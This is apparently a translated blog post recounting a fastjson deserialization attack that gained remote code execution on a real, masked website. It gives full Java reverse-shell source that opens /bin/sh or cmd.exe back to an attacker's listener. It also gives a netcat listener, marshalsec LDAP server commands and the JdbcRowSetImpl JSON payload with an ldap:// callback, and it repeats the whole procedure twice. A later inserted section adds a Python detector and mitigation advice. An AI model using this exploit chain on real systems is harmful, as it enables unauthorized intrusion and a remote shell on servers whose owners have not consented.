• Exploiting a fastjson deserialization vulnerability: a real-world case


      The full process of exploiting a fastjson deserialization RCE in a real case:

      Affected site: http://***.com/

      While looking for security vulnerabilities on the site, I came across a JSON request.

      The packet is as follows:

        

    POST /*** HTTP/1.1
    Host: ***
    Connection: close
    Content-Length: 100
    Accept: application/json, text/plain, */*
    Content-Type: application/json;charset=UTF-8
    Referer: *
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: *
    
    {"***":"***"}

      When I tried entering: 'a

        

    POST /*** HTTP/1.1
    Host: ***
    Connection: close
    Content-Length: 100
    Accept: application/json, text/plain, */*
    Content-Type: application/json;charset=UTF-8
    Referer: *
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: *
    
    {"***":"***'a"}

      This produced an error; the error message was:

      {"timestamp":1556677012822,"status":500,"error":"Internal Server Error","exception":"com.****.fastjson.JSONException.....}

      fastjson: that immediately brought the fastjson deserialization vulnerability to mind.

      For exploitation, two files are needed:

      1. reverse.java

      2. marshalsec-0.0.1-SNAPSHOT-all.jar

      The code of reverse.java:

      

    import java.io.BufferedReader;
    import java.io.BufferedWriter;
    import java.io.InputStream;
    import java.io.InputStreamReader;
    import java.io.OutputStream;
    import java.io.OutputStreamWriter;
    import java.net.Socket;

    public class reverse {
        // Copies one stream into another until EOF; one thread per direction.
        class StreamConnector extends Thread {
            InputStream hx;
            OutputStream il;

            StreamConnector(InputStream hx, OutputStream il) {
                this.hx = hx;
                this.il = il;
            }

            public void run() {
                BufferedReader ar = null;
                BufferedWriter slm = null;
                try {
                    ar = new BufferedReader(new InputStreamReader(this.hx));
                    slm = new BufferedWriter(new OutputStreamWriter(this.il));
                    char[] buffer = new char[8192];
                    int length;
                    while ((length = ar.read(buffer, 0, buffer.length)) > 0) {
                        slm.write(buffer, 0, length);
                        slm.flush();
                    }
                } catch (Exception localException) {
                }
                try {
                    if (ar != null) {
                        ar.close();
                    }
                    if (slm != null) {
                        slm.close();
                    }
                } catch (Exception localException1) {
                }
            }
        }

        // The no-argument constructor does the work: it runs when the class is
        // instantiated by the JNDI client, so main() is not involved on that path.
        public reverse() {
            reverseConn("服务器ip:端口号"); // placeholder kept from the original: listener ip:port
        }

        // Only reached when the class is launched directly; does nothing useful.
        public static void main(String[] args) {
            System.out.println("0");
        }

        public void reverseConn(String ip) {
            String ipport = ip;
            try {
                String ShellPath;
                if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
                    ShellPath = "/bin/sh";
                } else {
                    ShellPath = "cmd.exe";
                }
                Socket socket = new Socket(ipport.split(":")[0],
                    Integer.parseInt(ipport.split(":")[1]));
                Process process = Runtime.getRuntime().exec(ShellPath);
                new StreamConnector(process.getInputStream(),
                    socket.getOutputStream()).start();
                new StreamConnector(process.getErrorStream(),
                    socket.getOutputStream()).start();
                new StreamConnector(socket.getInputStream(),
                    process.getOutputStream()).start();
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
    }

      marshalsec-0.0.1-SNAPSHOT-all.jar can be found online.

      Test server: Alibaba Cloud server (CentOS)

      Required environment: 1. JDK 1.8   2. an Apache service   3. without Apache, Python's built-in web server

      JDK 1.8 installation reference: https://blog.51cto.com/kmt1994/2325949?source=dra

      If configuring Apache is too much trouble, just use: python -m SimpleHTTPServer 8000 (port 8000 as an example); if Apache is configured, it listens on the default port 80.

      Visit http://服务器ip:8000 or http://服务器ip:80 (服务器ip stands for the server's IP address in the commands below).

      Without an Apache (web) service, the procedure is as follows:

      Put reverse.java and marshalsec-0.0.1-SNAPSHOT-all.jar in the web root:

      Step 1: javac reverse.java to produce reverse.class

      Step 2: python -m SimpleHTTPServer 8000 to start a web server on port 8000

      Step 3: in a new window: nc -lvvp 1234   * the listening port must match the port configured in reverse.java

      Step 4: in a new window: java -cp marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://服务器ip:8000/#reverse  10086

      Step 5: construct the packet:

      

    POST /*** HTTP/1.1
    Host: ***
    Connection: close
    Content-Length: 100
    Accept: application/json, text/plain, */*
    Content-Type: application/json;charset=UTF-8
    Referer: *
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: *
    
    {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://服务器ip:10086/Object","autoCommit":true}

      Sending the packet caused a noticeable delay; checking the window from step 3 showed:

      Reverse shell obtained.
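      From the defender's side, two things in this case give the attack away: the 500 response that leaks the parser's exception class name (the fingerprint the tester used), and a request body carrying an "@type" key whose value is a JNDI sink class alongside an ldap:// data source. The Python below is an example added here, not code from the original post or from the fastjson project: it scans JSON request bodies for both indicators and checks an error response for the leak. The sample bodies, the IP 198.51.100.7 and the sample error JSON are constructed, and the class list and regexes are a starting rule set of my own, not fastjson's own logic.

```python
import json
import re

# Class names that fastjson's @type autotype mechanism can resolve into a JNDI
# lookup; JdbcRowSetImpl is the one used in the case above (list is a starting point).
JNDI_SINK_CLASSES = {
    "com.sun.rowset.JdbcRowSetImpl",
}

# URL schemes that make a JNDI name resolve against a remote server.
JNDI_SCHEMES = re.compile(r"^\s*(ldap|ldaps|rmi)://", re.IGNORECASE)

# Error-response fingerprint: a fastjson exception class name inside a JSON
# error body such as the 500 response quoted in the post.
LEAKED_EXCEPTION = re.compile(
    r'"exception"\s*:\s*"([A-Za-z0-9_.$]*fastjson\.[A-Za-z0-9_.$]+)"'
)


def _walk(node, path, findings):
    """Recursively visit every object and array in a parsed JSON document."""
    if isinstance(node, dict):
        type_name = node.get("@type")
        if isinstance(type_name, str):
            severity = "high" if type_name in JNDI_SINK_CLASSES else "medium"
            findings.append((severity, path or "$", "@type=" + type_name))
        for key, value in node.items():
            child = f"{path}.{key}" if path else key
            if isinstance(value, str) and JNDI_SCHEMES.match(value):
                findings.append(("high", child, "jndi-url=" + value))
            _walk(value, child, findings)
    elif isinstance(node, list):
        for i, item in enumerate(node):
            _walk(item, f"{path}[{i}]", findings)


def inspect_request_body(body):
    """Return (severity, json_path, detail) findings for one request body.

    Any "@type" key is reported, because a benign API rarely lets the client
    pick a class; a known JNDI sink class or an ldap:// / rmi:// value is
    high severity. A body that is not JSON yields no findings.
    """
    findings = []
    try:
        doc = json.loads(body)
    except ValueError:
        return findings
    _walk(doc, "", findings)
    return findings


def max_severity(findings):
    """Collapse a finding list to its worst severity ("none" when empty)."""
    order = {"high": 2, "medium": 1}
    return max((f[0] for f in findings), key=order.get, default="none")


def leaked_parser_name(response_body):
    """Return the fastjson exception class a verbose error body leaks, or None."""
    m = LEAKED_EXCEPTION.search(response_body)
    return m.group(1) if m else None


# Constructed sample traffic (not captured from the site in the post).
SAMPLE_BODIES = {
    "benign": '{"name":"alice","tags":["a","b"]}',
    "post_payload": '{"@type":"com.sun.rowset.JdbcRowSetImpl",'
                    '"dataSourceName":"ldap://198.51.100.7:10086/Object","autoCommit":true}',
    "nested_autotype": '{"user":{"@type":"com.example.Unknown","x":1}}',
    "not_json": "username=alice&password=x",
}

# Constructed error body modelled on the 500 response quoted above.
SAMPLE_ERROR = ('{"timestamp":1556677012822,"status":500,"error":"Internal Server Error",'
                '"exception":"com.alibaba.fastjson.JSONException","message":"syntax error"}')

if __name__ == "__main__":
    for label, body in SAMPLE_BODIES.items():
        found = inspect_request_body(body)
        print(f"{label}: {max_severity(found)} {found}")
    print("leaked parser:", leaked_parser_name(SAMPLE_ERROR))
```

      Run over the samples, the benign and non-JSON bodies produce no findings, the nested "@type" is medium, and the payload from the post is high on both the class name and the ldap:// value. Request-side matching like this is only a stopgap: the fix belongs in the application, which should keep fastjson's autotype support disabled (fastjson 1.2.68 and later also offer safeMode, which turns autotype off entirely) and return generic error bodies that do not name the JSON library in use.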

      

      If an Apache service is available, the procedure is as follows:

      Step 1. Place the two files in the web root; my web root is /var/www/html

      Step 2. javac reverse.java to produce reverse.class

      Step 3. In a new window: nc -lvvp 1234   * the listening port must match the port configured in reverse.java

      Step 4: in a new window: java -cp marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://服务器ip:80/#reverse  10086 *(Apache's default port is 80)

      Step 5: construct the packet:

        

    POST /*** HTTP/1.1
    Host: ***
    Connection: close
    Content-Length: 100
    Accept: application/json, text/plain, */*
    Content-Type: application/json;charset=UTF-8
    Referer: *
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: *
    
    {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://服务器ip:10086/Object","autoCommit":true}

      Sending the packet causes a delay; then check the step 3 window:

      Reverse shell obtained.

      

      Pitfall: these commands must be run from the web root!

        

  • Original article: https://www.cnblogs.com/piaomiaohongchen/p/10799466.html